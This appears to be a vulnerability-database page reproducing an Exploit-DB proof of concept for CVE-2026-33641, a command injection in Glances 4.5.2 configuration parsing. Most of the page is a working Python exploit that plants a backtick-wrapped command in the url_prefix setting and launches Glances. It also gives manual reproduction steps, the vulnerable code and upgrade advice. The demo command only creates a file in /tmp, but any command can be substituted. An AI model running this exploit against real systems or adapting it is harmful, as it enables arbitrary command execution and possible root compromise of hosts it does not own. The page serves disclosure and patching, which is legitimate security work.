Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Glances 4.5.2 Command Injection

🗓️ 13 May 2026 00:00:00Reported by Stepanov DaniilType 
packetstorm
 packetstorm🔗 packetstorm.news👁 29 Views

Glances 4.5.2 allows backtick command execution in config parsing, risking privilege escalation.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-33641
2 Apr 202614:57
attackerkb
AlpineLinux		CVE-2026-33641
2 Apr 202614:57
alpinelinux
Information Security Automation		April Linux Patch Wednesday
22 Apr 202616:00
avleonov
Circl		CVE-2026-33641
29 Mar 202615:04
circl
CNNVD		glances 安全漏洞
2 Apr 202600:00
cnnvd
CVE		CVE-2026-33641
2 Apr 202614:57
cve
Cvelist		CVE-2026-33641 Glances Vulnerable to Command Injection via Dynamic Configuration Values
2 Apr 202614:57
cvelist
Debian CVE		CVE-2026-33641
2 Apr 202614:57
debiancve
Exploit DB		glances 4.5.2 - command injection
13 May 202600:00
exploitdb
Github Security Blog		Glances Vulnerable to Command Injection via Dynamic Configuration Values
30 Mar 202617:01
github
Rows per page
#!/usr/bin/env python3
    # Exploit Title: glances 4.5.2 - command injection
    # Date: 2026-04-09
    # Exploit Author: Stepanov Daniil
    # Vendor Homepage: https://github.com/nicolargo/glances
    # Software Link: https://github.com/nicolargo/glances
    # Version: 4.5.2 and below (fixed in 4.5.3)
    # Tested on: Kali Linux 2026.1, Ubuntu 22.04
    # CVE: CVE-2026-33641
    # CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
    
    '''
    Vulnerability Description:
    --------------------------
    Glances versions prior to 4.5.3 support dynamic configuration values in which 
    substrings enclosed in backticks are executed as system commands during 
    configuration parsing. This behavior occurs in Config.get_value() and is 
    implemented without validation or restriction of the executed commands.
    
    If an attacker can modify or influence configuration files, arbitrary commands 
    will execute automatically with the privileges of the Glances process during 
    startup or configuration reload. In deployments where Glances runs with 
    elevated privileges (e.g., as a system service), this may lead to privilege 
    escalation.
    
    CVSS Score: 7.8 (HIGH) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    Affected component: glances/config.py and glances/globals.py
    
    Credit: Discovered by Stepanov Daniil
    '''
    
    import subprocess
    import os
    import sys
    import tempfile
    
    def create_malicious_config(command):
        """
        Create a malicious Glances configuration file that executes arbitrary commands.
        
        The vulnerable Config.get_value() method scans for substrings enclosed in 
        backticks and executes them via system_exec(), which uses subprocess.run()
        with shell=False but the backticks are extracted and executed.
        
        Vulnerable code in glances/config.py:
        --------------------------------------------------
        match = self.re_pattern.findall(ret)
        for m in match:
            ret = ret.replace(m, system_exec(m[1:-1]))
        --------------------------------------------------
        
        Vulnerable code in glances/globals.py:
        --------------------------------------------------
        def system_exec(command, timeout=5):
            res = subprocess.run(command.split(' '), stdout=subprocess.PIPE,
                                timeout=timeout).stdout.decode('utf-8')
            return res
        --------------------------------------------------
        """
        
        config_content = f"""
    [outputs]
    url_prefix = `{command}`
    """
        
        # Create temporary configuration file
        config_file = tempfile.NamedTemporaryFile(mode='w', suffix='.conf', delete=False)
        config_file.write(config_content)
        config_file.close()
        
        return config_file.name
    
    def exploit():
        """
        Proof of Concept: Execute arbitrary commands via Glances configuration.
        """
        
        print("[+] CVE-2026-33641 - Glances Command Injection PoC")
        print("[+] Exploit Author: Stepanov Daniil")
        print()
        
        # Command to execute (create a file in /tmp as proof)
        test_file = "/tmp/glances_pwned"
        command = f"touch {test_file}"
        
        print(f"[+] Creating malicious config with command: {command}")
        config_path = create_malicious_config(command)
        print(f"[+] Config file created: {config_path}")
        
        print(f"[+] Launching Glances with malicious config...")
        print("[+] If vulnerable, the command will execute during config parsing")
        print()
        
        # Execute Glances with the malicious config
        # Note: Glances must be installed in the environment
        try:
            result = subprocess.run(
                ["glances", "-C", config_path, "--timeout", "2"],
                capture_output=True,
                text=True,
                timeout=5
            )
        except FileNotFoundError:
            print("[!] Error: Glances is not installed or not in PATH")
            print("[!] Install with: pip install glances==4.5.2")
            sys.exit(1)
        except subprocess.TimeoutExpired:
            pass  # Glances may run indefinitely, that's fine
        
        # Check if the command was executed
        print("[+] Checking if command was executed...")
        if os.path.exists(test_file):
            print(f"[✓] SUCCESS! File created: {test_file}")
            print("[✓] Command injection confirmed!")
            print("[!] Vulnerability exists in this version of Glances")
            os.remove(test_file)
        else:
            print("[✗] File not found. Either the vulnerability is patched")
            print("    or the command could not be executed.")
        
        # Cleanup
        os.unlink(config_path)
        print(f"\n[+] Cleanup complete: {config_path} removed")
        
        print("\n[+] For more information, visit:")
        print("    https://nvd.nist.gov/vuln/detail/CVE-2026-33641")
    
    def manual_verification_guide():
        """
        Alternative manual verification method if Glances is not in PATH.
        """
        print("\n" + "="*60)
        print("MANUAL VERIFICATION GUIDE")
        print("="*60)
        print("""
    If Glances is not installed, you can verify the vulnerability by:
    1. Create a file /tmp/malicious.conf with:
       [outputs]
       url_prefix = `touch /tmp/glances_pwned`
    
    2. Run: glances -C /tmp/malicious.conf
    
    3. Check if /tmp/glances_pwned exists
    """)
    
    if __name__ == "__main__":
        exploit()
        manual_verification_guide()
    
    # Additional notes for Exploit-DB:
    # ---------------------------------
    # Impact:
    # - Arbitrary command execution with privileges of Glances process
    # - Often Glances runs with elevated privileges (root/sudo)
    # - Can lead to complete system compromise
    #
    # Fix:
    # - Upgrade to Glances version 4.5.3 or higher
    # - The dynamic backtick execution feature was completely removed
    #
    # References:
    # - https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7
    # - https://github.com/nicolargo/glances/releases/tag/v4.5.3

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.17.8
EPSS0.00635
SSVC
glancescommand injectionconfig parsingbacktick executionprivilege escalation2026-33641
29